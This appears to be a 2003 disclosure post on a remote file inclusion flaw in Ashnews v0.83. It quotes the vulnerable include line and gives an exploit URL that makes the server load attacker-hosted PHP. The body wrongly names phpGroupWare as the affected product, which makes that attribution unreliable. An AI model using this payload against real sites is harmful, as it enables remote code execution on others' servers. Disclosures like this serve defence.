######################################################

## Name: Phil Dunn ##

## Email: z3hp (at) yahoo (dot) com [email concealed] ##

## Date: July - 20 - 2003 ##

## Program: Ashnews v0.83 ##

## Version: v0.83 ##

##Vendor Name: AshWebStudio ##

## Vendor URL: http://projects.ashwebstudio.com/ ##

######################################################

An include file vulnerability was found in phpGroupWare. This exploit

works for all Branches. A remote

user can create arbitrary PHP code and locate it on a remote server. Then,

the remote user can issue a

specially crafted URL to the target server that specifies the remote PHP

code for inclusion.

ashnews.php & ashheadlines.php @ line 14

-----------------------------------------------

include($pathtoashnews."ashprojects/newsconfig.php");

-----------------------------------------------

Exploit:

http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]

[ reply ]